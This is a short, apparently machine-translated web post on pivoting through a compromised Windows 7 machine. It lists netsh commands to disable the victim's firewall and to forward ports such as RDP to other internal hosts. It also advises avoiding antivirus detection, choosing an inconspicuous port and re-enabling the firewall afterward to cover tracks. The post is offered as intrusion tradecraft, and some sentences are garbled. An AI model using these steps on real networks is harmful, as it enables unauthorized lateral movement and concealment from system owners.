Win7 penetration technique

  

The target is WIN7 X64, and the firewall is turned on. I want to use his machine to access other machines, but I don't want to log in to his system. The general method is to upload a htran and then forward it, but the other party. There is a soft kill, there is the possibility of being killed, so I use another method to achieve my purpose.

For convenience, first close his firewall

netsh advfirewall set allprofiles state off (win2003&xp is closed with netsh firewall set opmode DISABLE) You can also release the listenport, specific commands to check the data . Then use netsh interface portproxy to forward to the target server, but there is a small flaw, the port can be seen in the system, after all, is the R3 layer of things, unlike Linux's IPTABLES, so you must choose a confusing port. After the operation is complete, restore the firewall netsh advfirewall set allprofiles state on. Then retreat.

For netsh forwarding, please refer to the following: Windows
Port forwarding. Add:

netsh interface portproxy add v4tov4 listenport=forward port listenaddress=local IP connectport=target port connectaddress=target IP Example:

netsh interface portproxy add v4tov4 8002 202.112.58.200 8002 //Local ALL IP to target IP8002

netsh interface portproxy add v4tov4 listenport=5200 listenaddress=1.1.1.1 connectport=3389 connectaddress=2.2.2.2 //Specify IP forwarding. XP/2003 needs to install IPV6

netsh interface ipv6 install Delete:

netsh interface portproxy delete v4tov4 listenport=forward port listenaddress=local IP

Configure IP routing forwarding:

netsh interface ipv4 set int 26 forwarding=enabled

26 is the network interface number, which can be viewed with netsh interface ipv4 show interfaces.

Copyright © Windows knowledge All Rights Reserved